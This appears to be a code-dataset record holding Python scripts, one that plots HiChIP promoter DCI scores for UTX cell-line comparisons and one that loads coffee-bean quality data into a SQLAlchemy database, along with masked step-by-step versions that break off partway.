"step-4": "import sys, argparse\nimport os, glob\nimport numpy as np\nimport pandas as pd\nimport re, bisect\nfrom scipy import stats\nimport matplotlib\nimport matplotlib.pyplot as plt\nmatplotlib.rcParams['font.size'] = 11\nimport seaborn as sns\nsns.set(font_scale=1.1)\nsns.set_style('whitegrid', {'axes.grid': False})\nsns.set_style('ticks', {'ytick.color': 'k', 'axes.edgecolor': 'k'})\nmatplotlib.rcParams['font.sans-serif'] = ['Arial']\nmatplotlib.rcParams['mathtext.fontset'] = 'custom'\nmatplotlib.rcParams['mathtext.rm'] = 'Arial'\n\n\ndef return_dci_df(DCI_dir, subdir, hm_mark, compr_type, suffix):\n dci_file = '{}/{}/{}_{}{}.csv'.format(DCI_dir, subdir, hm_mark,\n compr_type, suffix)\n if os.path.isfile(dci_file):\n dci_df = pd.read_csv(dci_file, sep='\\t', index_col=4)\n dci_df.columns = ['chr', 'start', 'end', 'IfOverlap', 'score',\n 'strand', 'DCI']\n return dci_df\n else:\n return None\n\n\ndef scatter_plot_compr_DCI(num_DCI_bins_df, subdir, hm_mark, compr_type,\n suffix, dci_thre):\n compr_x = compr_type[0]\n compr_y = compr_type[1]\n test_file = '{}/{}/{}_{}{}.csv'.format(DCI_dir, subdir, hm_mark,\n compr_y, suffix)\n if os.path.isfile(test_file):\n dci_df_wt_over_vector = return_dci_df(DCI_dir, subdir, hm_mark,\n 'WT_over_Vector', suffix)\n up_bins = dci_df_wt_over_vector[dci_df_wt_over_vector['DCI'] > dci_thre\n ].index\n dn_bins = dci_df_wt_over_vector[dci_df_wt_over_vector['DCI'] < -1 *\n dci_thre].index\n dci_df_x = return_dci_df(DCI_dir, subdir, hm_mark, compr_x, suffix)\n dci_df_y = return_dci_df(DCI_dir, subdir, hm_mark, compr_y, suffix)\n plt.figure(figsize=(2.1, 2.1))\n plt.scatter(dci_df_x.loc[:, 'DCI'], dci_df_y.loc[:, 'DCI'], c=\n 'tab:grey', s=3, alpha=1, rasterized=True, label='All genes')\n plt.scatter(dci_df_x.loc[up_bins, 'DCI'], dci_df_y.loc[up_bins,\n 'DCI'], c='tab:red', s=3, alpha=1, rasterized=True, label=\n 'Genes w/ DCI$>{}$ in WT/Vector'.format(dci_thre))\n plt.scatter(dci_df_x.loc[dn_bins, 'DCI'], dci_df_y.loc[dn_bins,\n 'DCI'], c='tab:blue', s=3, alpha=1, rasterized=True, label=\n 'Genes w/ DCI$<{}$ in WT/Vector'.format(-1 * dci_thre))\n x, y = dci_df_x.loc[:, 'DCI'], dci_df_y.loc[:, 'DCI']\n slope, intercept, r_value, p_value, std_err = stats.linregress(x, y)\n output_prename = '{}_{}_{}_dci{}'.format(subdir, hm_mark, suffix,\n dci_thre)\n num_DCI_bins_df.loc[output_prename, 'scatter_pearsonr_s'] = r_value\n num_DCI_bins_df.loc[output_prename, 'scatter_pearsonr_p'] = p_value\n x_sort = np.sort(x)\n plt.plot(x_sort, x_sort * slope + intercept, c='k', ls='--', lw=0.8)\n plt.text(0.97, 0.97, '$r={:.2f}$ '.format(r_value), fontsize=10,\n transform=plt.axes().transAxes, ha='right', va='top')\n plt.axhline(y=0, c='k', lw=1)\n plt.axvline(x=0, c='k', lw=1)\n plt.legend(fontsize=10.5, borderaxespad=0.1, labelspacing=0.1,\n handletextpad=0.1, handlelength=1, loc='upper left',\n markerscale=3, bbox_to_anchor=[-0.12, 1.36], frameon=False)\n xa, xb = cellType_labels[compr_x.split('_')[0]], cellType_labels[\n compr_x.split('_')[-1]]\n ya, yb = cellType_labels[compr_y.split('_')[0]], cellType_labels[\n compr_y.split('_')[-1]]\n plt.xlabel('DCI score ({} over {})'.format(xa, xb), fontsize=12)\n plt.ylabel('DCI score ({} over {})'.format(ya, yb), fontsize=12)\n plt.savefig('{}/{}/scatter_{}_{}_vs_{}{}_dci{}.png'.format(outdir,\n subdir, hm_mark, compr_x, compr_y, suffix, dci_thre),\n bbox_inches='tight', pad_inches=0.1, dpi=600, transparent=True)\n plt.show()\n plt.close()\n return up_bins, dn_bins\n return [], []\n\n\ndef plot_box_figs(subdir, hm_mark, suffix, selected_bins, color, title,\n dci_thre, num_DCI_bins_df, flag):\n test_file = '{}/{}/{}_{}{}.csv'.format(DCI_dir, subdir, hm_mark,\n 'WT_over_Vector', suffix)\n if os.path.isfile(test_file):\n box_vals = []\n xticklabels = []\n sig_vals, sig_colors = [], []\n for compr_col in ['WT_over_Vector', 'DEL_over_WT', 'EIF_over_DEL',\n 'TPR_over_WT']:\n dci_df = return_dci_df(DCI_dir, subdir, hm_mark, compr_col, suffix)\n if dci_df is not None:\n box_val = dci_df.loc[selected_bins]['DCI'].values\n dci_df.loc[selected_bins].to_csv(\n '{}/{}/box_{}_{}_genes{}_dci{}_{}.csv'.format(outdir,\n subdir, hm_mark, flag, suffix, dci_thre, compr_col))\n s, p = stats.ttest_1samp(box_val, 0)\n sig_vals.append('*' if p < 0.05 else '')\n sig_colors.append('b' if s < 0 else 'r')\n box_vals.append(box_val)\n xa, xb = cellType_labels[compr_col.split('_')[0]\n ], cellType_labels[compr_col.split('_')[-1]]\n xticklabels.append('{} over {}'.format(xa, xb))\n num_DCI_bins_df.loc['{}_{}_{}_dci{}'.format(subdir, hm_mark,\n suffix, dci_thre), '{} {} s'.format(title.split()[2],\n compr_col)] = '{:.2f}'.format(s)\n num_DCI_bins_df.loc['{}_{}_{}_dci{}'.format(subdir, hm_mark,\n suffix, dci_thre), '{} {} p'.format(title.split()[2],\n compr_col)] = '{:.2e}'.format(p)\n positions = np.arange(len(box_vals))\n fig = plt.figure(figsize=(0.46 * len(box_vals), 2.2))\n g = plt.boxplot(box_vals, positions=positions, widths=0.5,\n patch_artist=True, boxprops=dict(color='k', facecolor='w', fill\n =None, lw=1), medianprops=dict(color='k'), showfliers=False)\n plt.axes().set_xticklabels(xticklabels, rotation=30, ha='right',\n fontsize=12)\n plt.ylabel('DCI score'.format(hm_mark), fontsize=13)\n for ii in positions:\n plt.scatter(ii, np.median(box_vals[ii]), marker=sig_vals[ii],\n color='red', s=77)\n plt.axhline(y=0, c='k', lw=1)\n plt.title(title, fontsize=12)\n plt.savefig('{}/{}/box_{}_{}_genes{}_dci{}.png'.format(outdir,\n subdir, hm_mark, flag, suffix, dci_thre), bbox_inches='tight',\n pad_inches=0.1, dpi=600, transparent=True)\n plt.show()\n plt.close()\n\n\ncellType_labels = {'Vector': 'Vector', 'WT': 'WT', 'DEL': '$\\\\Delta$cIDR',\n 'EIF': 'UTX-eIF$_{IDR}$', 'TPR': '$\\\\Delta$TPR', 'MT2': 'MT2', 'FUS':\n 'UTX-FUS$_{IDR}$'}\noutdir = 'f4_promoter_DCI_scatter'\nos.makedirs(outdir, exist_ok=True)\nproject_dir = '/Volumes/zanglab/zw5j/since2019_projects/UTX_HaoJiang'\nDCI_dir = (\n '{}/f5_hichip/f1_hichip_bart3d_new/f1_DEG_promoter_DCI/f1_promoter_DCI'\n .format(project_dir))\nsubdirs = ['bart3d_dis200k_data_1st_submit', 'bart3d_dis200k_data202008',\n 'bart3d_dis500k_data_1st_submit', 'bart3d_dis500k_data202008']\ncompr_types = [['WT_over_Vector', 'DEL_over_WT'], ['DEL_over_WT',\n 'EIF_over_DEL'], ['WT_over_Vector', 'TPR_over_WT']]\nhm_marks = ['H3K4me3', 'H3K27ac']\nsuffixes = ['_promoter_DCI']\ndci_thres = [2, 5]\nnum_DCI_bins_df = pd.DataFrame()\nfor subdir in subdirs[1:2]:\n outdir_tmp = '{}/{}'.format(outdir, subdir)\n os.makedirs(outdir_tmp, exist_ok=True)\n for hm_mark in hm_marks[:]:\n for suffix in suffixes[:]:\n for dci_thre in dci_thres[1:]:\n for compr_type in compr_types[:]:\n up_bins, dn_bins = scatter_plot_compr_DCI(num_DCI_bins_df,\n subdir, hm_mark, compr_type, suffix, dci_thre)\n if compr_type[1] == 'DEL_over_WT':\n num_DCI_bins_df.loc['{}_{}_{}_dci{}'.format(subdir,\n hm_mark, suffix, dci_thre), '# up genes'] = len(\n up_bins)\n num_DCI_bins_df.loc['{}_{}_{}_dci{}'.format(subdir,\n hm_mark, suffix, dci_thre), '# dn genes'] = len(\n dn_bins)\n selected_bins = up_bins\n color = 'tab:red'\n title = ('Genes w/ DCI$>{}$ \\n in WT over Vector'.\n format(dci_thre))\n plot_box_figs(subdir, hm_mark, suffix,\n selected_bins, color, title, dci_thre,\n num_DCI_bins_df, 'increased')\n selected_bins = dn_bins\n color = 'tab:blue'\n title = ('Genes w/ DCI$<{}$ \\n in WT over Vector'.\n format(-1 * dci_thre))\n plot_box_figs(subdir, hm_mark, suffix,\n selected_bins, color, title, dci_thre,\n num_DCI_bins_df, 'decreased')\nnum_DCI_bins_df.to_csv(outdir + os.sep + 'num_DCI_promoter_summary.csv')\n",
"step-5": "import sys,argparse\nimport os,glob\nimport numpy as np\nimport pandas as pd\nimport re,bisect\nfrom scipy import stats\nimport matplotlib\n# matplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nmatplotlib.rcParams['font.size']=11\nimport seaborn as sns\nsns.set(font_scale=1.1)\nsns.set_style(\"whitegrid\", {'axes.grid' : False})\nsns.set_style(\"ticks\",{'ytick.color': 'k','axes.edgecolor': 'k'})\nmatplotlib.rcParams[\"font.sans-serif\"] = [\"Arial\"]\nmatplotlib.rcParams['mathtext.fontset'] = 'custom'\nmatplotlib.rcParams[\"mathtext.rm\"] = \"Arial\"\n\n\n\n# def return_dci_df(DCI_dir,subdir,hm_mark,compr_type,suffix):\n\n# dci_file = '{}/{}/{}_{}{}.bed'.format(DCI_dir,subdir,hm_mark,compr_type,suffix)\n# dci_df = pd.read_csv(dci_file,sep='\\t',header=None)\n# dci_df.columns=['chr','start','end','DCI']\n# dci_df.index = ['_'.join(ii) for ii in dci_df[['chr','start','end']].values.astype(str)]\n# return dci_df\n\ndef return_dci_df(DCI_dir,subdir,hm_mark,compr_type,suffix):\n\n dci_file = '{}/{}/{}_{}{}.csv'.format(DCI_dir,subdir,hm_mark,compr_type,suffix)\n if os.path.isfile(dci_file):\n dci_df = pd.read_csv(dci_file,sep='\\t',index_col=4)\n dci_df.columns=['chr','start','end','IfOverlap','score','strand','DCI'] \n return dci_df\n else:\n return None\n \n\ndef scatter_plot_compr_DCI(num_DCI_bins_df,subdir,hm_mark,compr_type,suffix,dci_thre):\n\n compr_x = compr_type[0]\n compr_y = compr_type[1]\n \n test_file='{}/{}/{}_{}{}.csv'.format(DCI_dir,subdir,hm_mark,compr_y,suffix)\n # print(test_file)\n if os.path.isfile(test_file): \n dci_df_wt_over_vector = return_dci_df(DCI_dir,subdir,hm_mark,'WT_over_Vector',suffix)\n up_bins = dci_df_wt_over_vector[dci_df_wt_over_vector['DCI']>dci_thre].index \n dn_bins = dci_df_wt_over_vector[dci_df_wt_over_vector['DCI']<-1*dci_thre].index \n \n dci_df_x = return_dci_df(DCI_dir,subdir,hm_mark,compr_x,suffix)\n dci_df_y = return_dci_df(DCI_dir,subdir,hm_mark,compr_y,suffix)\n\n # scatter plot\n plt.figure(figsize=(2.1,2.1))\n plt.scatter(dci_df_x.loc[:,'DCI'],dci_df_y.loc[:,'DCI'],c='tab:grey',s=3,alpha=1,rasterized=True,label='All genes')\n plt.scatter(dci_df_x.loc[up_bins,'DCI'],dci_df_y.loc[up_bins,'DCI'],c='tab:red',s=3,alpha=1,rasterized=True,label='Genes w/ DCI$>{}$ in WT/Vector'.format(dci_thre))\n plt.scatter(dci_df_x.loc[dn_bins,'DCI'],dci_df_y.loc[dn_bins,'DCI'],c='tab:blue',s=3,alpha=1,rasterized=True,label='Genes w/ DCI$<{}$ in WT/Vector'.format(-1*dci_thre))\n \n # save and plot the correlation\n x,y = dci_df_x.loc[:,'DCI'],dci_df_y.loc[:,'DCI']\n slope, intercept, r_value, p_value, std_err = stats.linregress(x, y) \n output_prename = '{}_{}_{}_dci{}'.format(subdir,hm_mark,suffix,dci_thre)\n num_DCI_bins_df.loc[output_prename,'scatter_pearsonr_s'] = r_value\n num_DCI_bins_df.loc[output_prename,'scatter_pearsonr_p'] = p_value\n x_sort = np.sort(x)\n plt.plot(x_sort,x_sort*slope+intercept,c = 'k',ls='--',lw=.8)\n plt.text(.97,.97,'$r={:.2f}$ '.format(r_value),fontsize=10,transform=plt.axes().transAxes,ha='right',va='top')\n \n plt.axhline(y=0,c='k',lw=1)\n plt.axvline(x=0,c='k',lw=1)\n # # plt.title('{} over {}'.format(cellType_labels[treatment],cellType_labels[control]))\n plt.legend(fontsize=10.5,borderaxespad=0.1,labelspacing=.1,handletextpad=0.1,\\\n handlelength=1,loc=\"upper left\",markerscale=3,bbox_to_anchor=[-0.12,1.36],frameon=False)\n xa,xb = cellType_labels[compr_x.split('_')[0]],cellType_labels[compr_x.split('_')[-1]]\n ya,yb = cellType_labels[compr_y.split('_')[0]],cellType_labels[compr_y.split('_')[-1]]\n plt.xlabel('DCI score ({} over {})'.format(xa,xb),fontsize=12)\n plt.ylabel('DCI score ({} over {})'.format(ya,yb),fontsize=12)\n plt.savefig('{}/{}/scatter_{}_{}_vs_{}{}_dci{}.png'.format(outdir,subdir,hm_mark,compr_x,compr_y,suffix,dci_thre),\\\n bbox_inches='tight',pad_inches=0.1,dpi=600,transparent=True)\n plt.show()\n plt.close()\n return up_bins,dn_bins\n return [],[]\n\n\n\n\ndef plot_box_figs(subdir,hm_mark,suffix,selected_bins,color,title,dci_thre,num_DCI_bins_df,flag):\n \n test_file='{}/{}/{}_{}{}.csv'.format(DCI_dir,subdir,hm_mark,'WT_over_Vector',suffix)\n \n if os.path.isfile(test_file): \n box_vals = []\n xticklabels = []\n sig_vals,sig_colors = [],[]\n for compr_col in ['WT_over_Vector','DEL_over_WT','EIF_over_DEL','TPR_over_WT']:\n dci_df = return_dci_df(DCI_dir,subdir,hm_mark,compr_col,suffix)\n if dci_df is not None:\n box_val = dci_df.loc[selected_bins]['DCI'].values\n # save the values in box plots\n dci_df.loc[selected_bins].to_csv('{}/{}/box_{}_{}_genes{}_dci{}_{}.csv'.format(outdir,subdir,hm_mark,flag,suffix,dci_thre,compr_col))\n s,p = stats.ttest_1samp(box_val,0)\n sig_vals.append('*' if p<0.05 else '')\n sig_colors.append('b' if s<0 else 'r')\n box_vals.append(box_val)\n xa,xb = cellType_labels[compr_col.split('_')[0]],cellType_labels[compr_col.split('_')[-1]] \n xticklabels.append('{} over {}'.format(xa,xb))\n num_DCI_bins_df.loc['{}_{}_{}_dci{}'.format(subdir,hm_mark,suffix,dci_thre),'{} {} s'.format(title.split()[2],compr_col)] = '{:.2f}'.format(s) \n num_DCI_bins_df.loc['{}_{}_{}_dci{}'.format(subdir,hm_mark,suffix,dci_thre),'{} {} p'.format(title.split()[2],compr_col)] = '{:.2e}'.format(p) \n \n #print(box_vals) \n positions = np.arange(len(box_vals))\n fig = plt.figure(figsize=(.46*len(box_vals),2.2))\n g = plt.boxplot(box_vals,positions=positions,widths = .5,patch_artist=True,\\\n boxprops=dict(color='k',facecolor='w',fill=None,lw=1),\\\n medianprops=dict(color='k'),showfliers=False) \n # g = plt.violinplot(box_vals)\n \n # for position_id in np.arange(len(positions)):\n # scatter_x = np.random.normal(positions[position_id],0.06,len(box_vals[position_id]))\n # plt.scatter(scatter_x,box_vals[position_id],color=color,s=5,zorder=0,alpha=0.6,rasterized=True)\n \n # for compr_pos in [[0,1,'t'],[1,2,'t'],[2,3,'t']]:\n # mark_pvalue(compr_pos,positions,box_vals)\n plt.axes().set_xticklabels(xticklabels,rotation=30,ha='right',fontsize=12)\n plt.ylabel('DCI score'.format(hm_mark),fontsize=13)\n # plt.ylim([-1,2])\n for ii in positions:\n plt.scatter(ii,np.median(box_vals[ii]),marker=sig_vals[ii],color='red',s=77)\n # plt.axes().text(ii,0,sig_vals[ii-1],fontsize=28,va='top',ha='center',color='red')\n plt.axhline(y=0,c='k',lw=1)\n plt.title(title,fontsize=12)\n # plt.legend(fontsize=16,borderaxespad=0.2,labelspacing=.2,handletextpad=0.2,handlelength=1,loc=\"upper right\",frameon=False)\n plt.savefig('{}/{}/box_{}_{}_genes{}_dci{}.png'.format(outdir,subdir,hm_mark,flag,suffix,dci_thre),\\\n bbox_inches='tight',pad_inches=0.1,dpi=600,transparent=True)\n plt.show()\n plt.close()\n\n\n\n\n# ==== main() \n\ncellType_labels= {'Vector':'Vector',\\\n 'WT':'WT',\\\n 'DEL':'$\\Delta$cIDR',\\\n 'EIF':'UTX-eIF$_{IDR}$',\\\n 'TPR':'$\\Delta$TPR',\\\n 'MT2':'MT2',\\\n 'FUS':'UTX-FUS$_{IDR}$'}\n\n \noutdir = 'f4_promoter_DCI_scatter'\nos.makedirs(outdir,exist_ok=True)\n\n# project_dir=\"/nv/vol190/zanglab/zw5j/since2019_projects/UTX_HaoJiang\"\nproject_dir=\"/Volumes/zanglab/zw5j/since2019_projects/UTX_HaoJiang\"\n# DCI_dir='{}/f5_hichip/f1_hichip_bart3d_new/f2_DEG_promoter_DCI_non_normalized/f1_promoter_DCI_rename'.format(project_dir)\nDCI_dir='{}/f5_hichip/f1_hichip_bart3d_new/f1_DEG_promoter_DCI/f1_promoter_DCI'.format(project_dir)\n# DCI_dir='{}/f5_hichip/f1_hichip_bart3d_new/f0_run_bart3d_new/bart3d_DCI_rename'.format(project_dir)\n# expr_dir='{}/f0_data_process/rna_seq/data_1st_submit_STAR_RSEM_new/f6_deg/f1_deseq2_out'.format(project_dir)\n# expr_dir='{}/f0_data_process/rna_seq/data_1st_submit_STAR_RSEM_new/f6_deg/fz_deseq2_out_combined'.format(project_dir)\n# deg_df = pd.read_csv('{}/deseq2_combined.csv'.format(expr_dir),index_col=0)\n\n\nsubdirs=['bart3d_dis200k_data_1st_submit','bart3d_dis200k_data202008',\n 'bart3d_dis500k_data_1st_submit','bart3d_dis500k_data202008']\n\ncompr_types = [['WT_over_Vector','DEL_over_WT'],['DEL_over_WT','EIF_over_DEL'],['WT_over_Vector','TPR_over_WT']]\nhm_marks = ['H3K4me3','H3K27ac']\nsuffixes=['_promoter_DCI']\ndci_thres = [2,5]\n\n\nnum_DCI_bins_df = pd.DataFrame()\nfor subdir in subdirs[1:2]: \n outdir_tmp='{}/{}'.format(outdir,subdir)\n os.makedirs(outdir_tmp,exist_ok=True)\n for hm_mark in hm_marks[:]:\n for suffix in suffixes[:]:\n for dci_thre in dci_thres[1:]:\n for compr_type in compr_types[:]:\n up_bins,dn_bins = scatter_plot_compr_DCI(num_DCI_bins_df,subdir,hm_mark,compr_type,suffix,dci_thre) \n \n # the box plot are exactly the same\n if compr_type[1]=='DEL_over_WT':\n num_DCI_bins_df.loc['{}_{}_{}_dci{}'.format(subdir,hm_mark,suffix,dci_thre),'# up genes'] = len(up_bins) \n num_DCI_bins_df.loc['{}_{}_{}_dci{}'.format(subdir,hm_mark,suffix,dci_thre),'# dn genes'] = len(dn_bins) \n \n ##### box plot\n selected_bins = up_bins\n color = 'tab:red'\n title = 'Genes w/ DCI$>{}$ \\n in WT over Vector'.format(dci_thre)\n plot_box_figs(subdir,hm_mark,suffix,selected_bins,color,title,dci_thre,num_DCI_bins_df,'increased')\n \n selected_bins = dn_bins\n color = 'tab:blue'\n title = 'Genes w/ DCI$<{}$ \\n in WT over Vector'.format(-1*dci_thre)\n plot_box_figs(subdir,hm_mark,suffix,selected_bins,color,title,dci_thre,num_DCI_bins_df,'decreased')\n \n\nnum_DCI_bins_df.to_csv(outdir+os.sep+'num_DCI_promoter_summary.csv')\n\n \n\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
import os
import sys
import logging.config
import sqlalchemy as sql
from sqlalchemy.orm import sessionmaker
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import Column, Float, String, Text, Integer
import pandas as pd
import numpy as np
sys.path.append('./config')
import config
logging.basicConfig(level=logging.INFO, format='%(name)s - %(levelname)s - %(asctime)s - %(message)s')
logger = logging.getLogger(__file__)
Base = declarative_base()
class BeanAttributes(Base):
""" Defines the data model for the table `bean_attributes`. """
__tablename__ = 'bean_attributes'
id = Column(Integer, primary_key=True)
species = Column(String(100), unique=False, nullable=True)
owner = Column(String(100), unique=False, nullable=True)
country = Column(String(100), unique=False, nullable=True)
farm_name = Column(String(100), unique=False, nullable=True)
company = Column(String(100), unique=False, nullable=True)
region = Column(String(100), unique=False, nullable=True)
producer = Column(String(100), unique=False, nullable=True)
grading_date = Column(String(100), unique=False, nullable=True)
processing_method = Column(Text, unique=False, nullable=True)
aroma = Column(Float, unique=False, nullable=True)
flavor = Column(Float, unique=False, nullable=True)
aftertaste = Column(Float, unique=False, nullable=True)
acidity = Column(Float, unique=False, nullable=True)
body = Column(Float, unique=False, nullable=True)
balance = Column(Float, unique=False, nullable=True)
uniformity = Column(Float, unique=False, nullable=True)
cleancup = Column(Float, unique=False, nullable=True)
sweetness = Column(Float, unique=False, nullable=True)
total_cup_point = Column(Float, unique=False, nullable=True)
moisture = Column(Float, unique=False, nullable=True)
color = Column(String(100), unique=False, nullable=True)
cluster = Column(Integer, unique=False, nullable=True)
def __repr__(self):
return '<BeanAttributes %r>' % self.id
def persist_to_db(engine_string):
"""Persist the data to database.
Args:
engine_string (`str`): Engine string for SQLAlchemy.
Returns:
None.
"""
engine = sql.create_engine(engine_string)
Base.metadata.create_all(engine)
Session = sessionmaker(bind=engine)
session = Session()
# Delete all existing records in the table
if config.LOCAL_DB_FLAG:
try:
session.execute('''DELETE FROM msia_db.bean_attributes''')
except:
pass
else:
try:
session.execute('''DELETE FROM bean_attributes''')
except:
pass
# Read the data table and persist it into the database
raw_data = pd.read_csv(config.DATA_TABLE_PATH)
raw_data = raw_data.replace(np.nan, '', regex=True)
try:
for i in range(raw_data.shape[0]):
bean_row = BeanAttributes(id=int(raw_data.iloc[i]['Unnamed: 0']),
species=str(raw_data.iloc[i]['Species']),
owner=str(raw_data.iloc[i]['Owner.1']),
country=str(raw_data.iloc[i]['Country.of.Origin']),
farm_name=str(raw_data.iloc[i]['Farm.Name']),
company=str(raw_data.iloc[i]['Company']),
region=str(raw_data.iloc[i]['Region']),
producer=str(raw_data.iloc[i]['Producer']),
grading_date=str(raw_data.iloc[i]['Grading.Date']),
processing_method=str(raw_data.iloc[i]['Processing.Method']),
aroma=float(raw_data.iloc[i]['Aroma']),
flavor=float(raw_data.iloc[i]['Flavor']),
aftertaste=float(raw_data.iloc[i]['Aftertaste']),
acidity=float(raw_data.iloc[i]['Acidity']),
body=float(raw_data.iloc[i]['Body']),
balance=float(raw_data.iloc[i]['Balance']),
uniformity=float(raw_data.iloc[i]['Uniformity']),
cleancup=float(raw_data.iloc[i]['Clean.Cup']),
sweetness=float(raw_data.iloc[i]['Sweetness']),
total_cup_point=float(raw_data.iloc[i]['Total.Cup.Points']),
moisture=float(raw_data.iloc[i]['Moisture']),
color=str(raw_data.iloc[i]['Color']),
cluster=int(raw_data.iloc[i]['cluster'])
)
session.add(bean_row)
logger.debug('Row %d added to table ' % i)
session.commit()
except sql.exc.IntegrityError: # Check primary key duplication
logger.error("Duplicated coffee bean")
except Exception as e:
logger.error("Incorrect credentials, access denied", e)
finally:
session.close()
if __name__ == "__main__":
# Obtain parameters from os
conn_type = "mysql+pymysql"
user = os.environ.get("MYSQL_USER")
password = os.environ.get("MYSQL_PASSWORD")
host = os.environ.get("MYSQL_HOST")
port = os.environ.get("MYSQL_PORT")
database = os.environ.get("DATABASE_NAME")
local_database_path = config.LOCAL_DATABASE_PATH
# If users wish to write to their own SQLALCHEMY_DATABASE_URI in the environment
if config.SQLALCHEMY_DATABASE_URI is None:
# Whether to create a local SQLite database or an AWS RDS database
if config.LOCAL_DB_FLAG:
engine_string = "sqlite:///{}".format(local_database_path)
else:
engine_string = "{}://{}:{}@{}:{}/{}".format(conn_type, user, password, host, port, database)
else:
engine_string = config.SQLALCHEMY_DATABASE_URI
try:
engine_string = 'sqlite:///data/bean.db'
persist_to_db(engine_string)
logger.info("Data successfully persisted into the database")
except Exception as e:
logger.error(e)
sys.exit(1)
|
normal
|
{
"blob_id": "76f2312a01bf8475220a9fcc16209faddfccd2ae",
"index": 9754,
"step-1": "<mask token>\n\n\nclass BeanAttributes(Base):\n \"\"\" Defines the data model for the table `bean_attributes`. \"\"\"\n __tablename__ = 'bean_attributes'\n id = Column(Integer, primary_key=True)\n species = Column(String(100), unique=False, nullable=True)\n owner = Column(String(100), unique=False, nullable=True)\n country = Column(String(100), unique=False, nullable=True)\n farm_name = Column(String(100), unique=False, nullable=True)\n company = Column(String(100), unique=False, nullable=True)\n region = Column(String(100), unique=False, nullable=True)\n producer = Column(String(100), unique=False, nullable=True)\n grading_date = Column(String(100), unique=False, nullable=True)\n processing_method = Column(Text, unique=False, nullable=True)\n aroma = Column(Float, unique=False, nullable=True)\n flavor = Column(Float, unique=False, nullable=True)\n aftertaste = Column(Float, unique=False, nullable=True)\n acidity = Column(Float, unique=False, nullable=True)\n body = Column(Float, unique=False, nullable=True)\n balance = Column(Float, unique=False, nullable=True)\n uniformity = Column(Float, unique=False, nullable=True)\n cleancup = Column(Float, unique=False, nullable=True)\n sweetness = Column(Float, unique=False, nullable=True)\n total_cup_point = Column(Float, unique=False, nullable=True)\n moisture = Column(Float, unique=False, nullable=True)\n color = Column(String(100), unique=False, nullable=True)\n cluster = Column(Integer, unique=False, nullable=True)\n\n def __repr__(self):\n return '<BeanAttributes %r>' % self.id\n\n\ndef persist_to_db(engine_string):\n \"\"\"Persist the data to database.\n Args:\n engine_string (`str`): Engine string for SQLAlchemy.\n Returns:\n None.\n \"\"\"\n engine = sql.create_engine(engine_string)\n Base.metadata.create_all(engine)\n Session = sessionmaker(bind=engine)\n session = Session()\n if config.LOCAL_DB_FLAG:\n try:\n session.execute('DELETE FROM msia_db.bean_attributes')\n except:\n pass\n else:\n try:\n session.execute('DELETE FROM bean_attributes')\n except:\n pass\n raw_data = pd.read_csv(config.DATA_TABLE_PATH)\n raw_data = raw_data.replace(np.nan, '', regex=True)\n try:\n for i in range(raw_data.shape[0]):\n bean_row = BeanAttributes(id=int(raw_data.iloc[i]['Unnamed: 0']\n ), species=str(raw_data.iloc[i]['Species']), owner=str(\n raw_data.iloc[i]['Owner.1']), country=str(raw_data.iloc[i][\n 'Country.of.Origin']), farm_name=str(raw_data.iloc[i][\n 'Farm.Name']), company=str(raw_data.iloc[i]['Company']),\n region=str(raw_data.iloc[i]['Region']), producer=str(\n raw_data.iloc[i]['Producer']), grading_date=str(raw_data.\n iloc[i]['Grading.Date']), processing_method=str(raw_data.\n iloc[i]['Processing.Method']), aroma=float(raw_data.iloc[i]\n ['Aroma']), flavor=float(raw_data.iloc[i]['Flavor']),\n aftertaste=float(raw_data.iloc[i]['Aftertaste']), acidity=\n float(raw_data.iloc[i]['Acidity']), body=float(raw_data.\n iloc[i]['Body']), balance=float(raw_data.iloc[i]['Balance']\n ), uniformity=float(raw_data.iloc[i]['Uniformity']),\n cleancup=float(raw_data.iloc[i]['Clean.Cup']), sweetness=\n float(raw_data.iloc[i]['Sweetness']), total_cup_point=float\n (raw_data.iloc[i]['Total.Cup.Points']), moisture=float(\n raw_data.iloc[i]['Moisture']), color=str(raw_data.iloc[i][\n 'Color']), cluster=int(raw_data.iloc[i]['cluster']))\n session.add(bean_row)\n logger.debug('Row %d added to table ' % i)\n session.commit()\n except sql.exc.IntegrityError:\n logger.error('Duplicated coffee bean')\n except Exception as e:\n logger.error('Incorrect credentials, access denied', e)\n finally:\n session.close()\n\n\n<mask token>\n",
"step-2": "<mask token>\nsys.path.append('./config')\n<mask token>\nlogging.basicConfig(level=logging.INFO, format=\n '%(name)s - %(levelname)s - %(asctime)s - %(message)s')\n<mask token>\n\n\nclass BeanAttributes(Base):\n \"\"\" Defines the data model for the table `bean_attributes`. \"\"\"\n __tablename__ = 'bean_attributes'\n id = Column(Integer, primary_key=True)\n species = Column(String(100), unique=False, nullable=True)\n owner = Column(String(100), unique=False, nullable=True)\n country = Column(String(100), unique=False, nullable=True)\n farm_name = Column(String(100), unique=False, nullable=True)\n company = Column(String(100), unique=False, nullable=True)\n region = Column(String(100), unique=False, nullable=True)\n producer = Column(String(100), unique=False, nullable=True)\n grading_date = Column(String(100), unique=False, nullable=True)\n processing_method = Column(Text, unique=False, nullable=True)\n aroma = Column(Float, unique=False, nullable=True)\n flavor = Column(Float, unique=False, nullable=True)\n aftertaste = Column(Float, unique=False, nullable=True)\n acidity = Column(Float, unique=False, nullable=True)\n body = Column(Float, unique=False, nullable=True)\n balance = Column(Float, unique=False, nullable=True)\n uniformity = Column(Float, unique=False, nullable=True)\n cleancup = Column(Float, unique=False, nullable=True)\n sweetness = Column(Float, unique=False, nullable=True)\n total_cup_point = Column(Float, unique=False, nullable=True)\n moisture = Column(Float, unique=False, nullable=True)\n color = Column(String(100), unique=False, nullable=True)\n cluster = Column(Integer, unique=False, nullable=True)\n\n def __repr__(self):\n return '<BeanAttributes %r>' % self.id\n\n\ndef persist_to_db(engine_string):\n \"\"\"Persist the data to database.\n Args:\n engine_string (`str`): Engine string for SQLAlchemy.\n Returns:\n None.\n \"\"\"\n engine = sql.create_engine(engine_string)\n Base.metadata.create_all(engine)\n Session = sessionmaker(bind=engine)\n session = Session()\n if config.LOCAL_DB_FLAG:\n try:\n session.execute('DELETE FROM msia_db.bean_attributes')\n except:\n pass\n else:\n try:\n session.execute('DELETE FROM bean_attributes')\n except:\n pass\n raw_data = pd.read_csv(config.DATA_TABLE_PATH)\n raw_data = raw_data.replace(np.nan, '', regex=True)\n try:\n for i in range(raw_data.shape[0]):\n bean_row = BeanAttributes(id=int(raw_data.iloc[i]['Unnamed: 0']\n ), species=str(raw_data.iloc[i]['Species']), owner=str(\n 